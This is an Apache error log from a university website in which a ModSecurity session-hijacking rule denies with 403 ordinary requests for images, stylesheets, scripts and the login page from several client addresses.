[Mon Aug 28 08:37:49.534483 2023] [:error] [pid 38059] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOv6bcCo-f0AAJSr3d4AAAAO"]
[Mon Aug 28 08:37:49.660350 2023] [:error] [pid 38059] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOv6bcCo-f0AAJSr3d8AAAAO"]
[Mon Aug 28 08:37:49.661190 2023] [:error] [pid 38499] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOv6bcCo-f0AAJZjwZ8AAAAC"]
[Mon Aug 28 08:37:49.763575 2023] [:error] [pid 38389] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOv6bcCo-f0AAJX1lFoAAAAS"]
[Mon Aug 28 08:37:49.776909 2023] [:error] [pid 38499] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOv6bcCo-f0AAJZjwaAAAAAC"]
[Mon Aug 28 08:37:49.779568 2023] [:error] [pid 38538] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOv6bcCo-f0AAJaKUnsAAAAF"]
[Mon Aug 28 08:37:49.879680 2023] [:error] [pid 38502] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fh-link.png"] [unique_id "ZOv6bcCo-f0AAJZmpPcAAAAA"]
[Mon Aug 28 08:37:49.892066 2023] [:error] [pid 38499] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOv6bcCo-f0AAJZjwaEAAAAC"]
[Mon Aug 28 08:37:49.951600 2023] [:error] [pid 38059] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/ft-link.png"] [unique_id "ZOv6bcCo-f0AAJSr3eAAAAAO"]
[Mon Aug 28 08:37:49.952722 2023] [:error] [pid 38389] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fisip-link.png"] [unique_id "ZOv6bcCo-f0AAJX1lFsAAAAS"]
[Mon Aug 28 08:37:49.964938 2023] [:error] [pid 38502] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fkip-link.png"] [unique_id "ZOv6bcCo-f0AAJZmpPgAAAAA"]
[Mon Aug 28 08:37:49.965118 2023] [:error] [pid 38539] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fe-link.png"] [unique_id "ZOv6bcCo-f0AAJaL2A0AAAAG"]
[Mon Aug 28 08:37:49.977134 2023] [:error] [pid 38499] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/pasca-link.png"] [unique_id "ZOv6bcCo-f0AAJZjwaIAAAAC"]
[Mon Aug 28 08:37:49.995107 2023] [:error] [pid 38303] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/akademik.png"] [unique_id "ZOv6bcCo-f0AAJWfZogAAAAI"]
[Mon Aug 28 08:37:50.080018 2023] [:error] [pid 38389] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/digilib-logo.png"] [unique_id "ZOv6bsCo-f0AAJX1lFwAAAAS"]
[Mon Aug 28 08:37:50.093011 2023] [:error] [pid 38538] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOv6bsCo-f0AAJaKUn0AAAAF"]
[Mon Aug 28 08:37:50.093686 2023] [:error] [pid 38303] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/pendaftaran_online.png"] [unique_id "ZOv6bsCo-f0AAJWfZokAAAAI"]
[Mon Aug 28 08:37:50.094854 2023] [:error] [pid 38539] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/rekrut_dosen.jpg"] [unique_id "ZOv6bsCo-f0AAJaL2A4AAAAG"]
[Mon Aug 28 08:38:07.598358 2023] [:error] [pid 38539] [client 123.253.233.84] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/index.php/c_mastah/grid_vstsemester"] [unique_id "ZOv6f8Co-f0AAJaL2DsAAAAG"]
[Mon Aug 28 08:38:08.253336 2023] [:error] [pid 38065] [client 123.253.233.84] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/index.php/c_tools/get_user"] [unique_id "ZOv6gMCo-f0AAJSxZYwAAAAH"]
[Mon Aug 28 08:42:29.590997 2023] [:error] [pid 38114] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOv7hcCo-f0AAJTioc8AAAAE"]
[Mon Aug 28 08:42:29.592811 2023] [:error] [pid 38065] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOv7hcCo-f0AAJSxZxEAAAAH"]
[Mon Aug 28 08:42:29.595694 2023] [:error] [pid 38059] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOv7hcCo-f0AAJSr3zIAAAAO"]
[Mon Aug 28 08:42:29.659779 2023] [:error] [pid 38538] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv7hcCo-f0AAJaKU9YAAAAF"]
[Mon Aug 28 08:42:29.662795 2023] [:error] [pid 38386] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOv7hcCo-f0AAJXyOiwAAAAM"]
[Mon Aug 28 08:42:29.672751 2023] [:error] [pid 38502] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOv7hcCo-f0AAJZmpsIAAAAA"]
[Mon Aug 28 08:42:29.679647 2023] [:error] [pid 38059] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOv7hcCo-f0AAJSr3zMAAAAO"]
[Mon Aug 28 08:42:29.688259 2023] [:error] [pid 38607] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOv7hcCo-f0AAJbPEMIAAAAC"]
[Mon Aug 28 08:42:29.693365 2023] [:error] [pid 38502] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOv7hcCo-f0AAJZmpsMAAAAA"]
[Mon Aug 28 08:42:29.695004 2023] [:error] [pid 38503] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOv7hcCo-f0AAJZnSzAAAAAB"]
[Mon Aug 28 08:42:29.702523 2023] [:error] [pid 38538] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOv7hcCo-f0AAJaKU9cAAAAF"]
[Mon Aug 28 08:42:29.704256 2023] [:error] [pid 38503] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOv7hcCo-f0AAJZnSzEAAAAB"]
[Mon Aug 28 08:42:29.707584 2023] [:error] [pid 38386] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOv7hcCo-f0AAJXyOi0AAAAM"]
[Mon Aug 28 08:42:29.712515 2023] [:error] [pid 38065] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOv7hcCo-f0AAJSxZxIAAAAH"]
[Mon Aug 28 08:42:29.718532 2023] [:error] [pid 38503] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOv7hcCo-f0AAJZnSzIAAAAB"]
[Mon Aug 28 08:42:29.719299 2023] [:error] [pid 38065] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOv7hcCo-f0AAJSxZxMAAAAH"]
[Mon Aug 28 08:42:29.725477 2023] [:error] [pid 38386] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fh-link.png"] [unique_id "ZOv7hcCo-f0AAJXyOi4AAAAM"]
[Mon Aug 28 08:42:29.728160 2023] [:error] [pid 38538] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fe-link.png"] [unique_id "ZOv7hcCo-f0AAJaKU9gAAAAF"]
[Mon Aug 28 08:42:29.737017 2023] [:error] [pid 38503] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fisip-link.png"] [unique_id "ZOv7hcCo-f0AAJZnSzMAAAAB"]
[Mon Aug 28 08:42:29.739105 2023] [:error] [pid 38114] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fkip-link.png"] [unique_id "ZOv7hcCo-f0AAJTiodAAAAAE"]
[Mon Aug 28 08:42:29.741276 2023] [:error] [pid 38386] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/ft-link.png"] [unique_id "ZOv7hcCo-f0AAJXyOi8AAAAM"]
[Mon Aug 28 08:42:29.751849 2023] [:error] [pid 38607] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv7hcCo-f0AAJbPEMMAAAAC"]
[Mon Aug 28 08:42:29.800481 2023] [:error] [pid 38065] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/pasca-link.png"] [unique_id "ZOv7hcCo-f0AAJSxZxQAAAAH"]
[Mon Aug 28 08:42:29.802648 2023] [:error] [pid 38502] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/akademik.png"] [unique_id "ZOv7hcCo-f0AAJZmpsQAAAAA"]
[Mon Aug 28 08:42:29.805258 2023] [:error] [pid 38607] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/pendaftaran_online.png"] [unique_id "ZOv7hcCo-f0AAJbPEMQAAAAC"]
[Mon Aug 28 08:42:29.813238 2023] [:error] [pid 38059] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOv7hcCo-f0AAJSr3zQAAAAO"]
[Mon Aug 28 08:42:29.815084 2023] [:error] [pid 38607] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/digilib-logo.png"] [unique_id "ZOv7hcCo-f0AAJbPEMUAAAAC"]
[Mon Aug 28 08:42:29.822229 2023] [:error] [pid 38114] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/rekrut_dosen.jpg"] [unique_id "ZOv7hcCo-f0AAJTiodEAAAAE"]
[Mon Aug 28 08:42:31.028084 2023] [:error] [pid 38502] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv7h8Co-f0AAJZmpsUAAAAA"]
[Mon Aug 28 08:42:49.338849 2023] [:error] [pid 38065] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv7mcCo-f0AAJSxZxcAAAAH"]
[Mon Aug 28 08:42:50.142963 2023] [:error] [pid 38303] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv7msCo-f0AAJWfaBsAAAAI"]
[Mon Aug 28 08:43:39.860237 2023] [:error] [pid 38644] [client 36.71.248.53] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOv7y8Co-f0AAJb0F78AAAAK"]
[Mon Aug 28 08:43:39.862154 2023] [:error] [pid 38539] [client 36.71.248.53] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOv7y8Co-f0AAJaL2S4AAAAG"]
[Mon Aug 28 08:43:39.928136 2023] [:error] [pid 38641] [client 36.71.248.53] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOv7y8Co-f0AAJbxo6UAAAAJ"]
[Mon Aug 28 08:43:39.964282 2023] [:error] [pid 38386] [client 36.71.248.53] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOv7y8Co-f0AAJXyOjUAAAAM"]
[Mon Aug 28 08:44:01.071309 2023] [:error] [pid 38539] [client 36.71.248.53] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv74cCo-f0AAJaL2TAAAAAG"]
[Mon Aug 28 08:44:20.428091 2023] [:error] [pid 38386] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/reset-min.css"] [unique_id "ZOv79MCo-f0AAJXyOjkAAAAM"]
[Mon Aug 28 08:44:20.457554 2023] [:error] [pid 38641] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/style.css"] [unique_id "ZOv79MCo-f0AAJbxo6kAAAAJ"]
[Mon Aug 28 08:44:20.478676 2023] [:error] [pid 38643] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/gallery_album.css"] [unique_id "ZOv79MCo-f0AAJbzb-wAAAAD"]
[Mon Aug 28 08:44:20.483052 2023] [:error] [pid 38502] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/ddsmoothmenu.css"] [unique_id "ZOv79MCo-f0AAJZmptMAAAAA"]
[Mon Aug 28 08:44:20.495633 2023] [:error] [pid 38059] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/jquery.fancybox-1.3.4.css"] [unique_id "ZOv79MCo-f0AAJSr3z4AAAAO"]
[Mon Aug 28 08:44:20.499371 2023] [:error] [pid 38607] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/nivo-slider.css"] [unique_id "ZOv79MCo-f0AAJbPEM8AAAAC"]
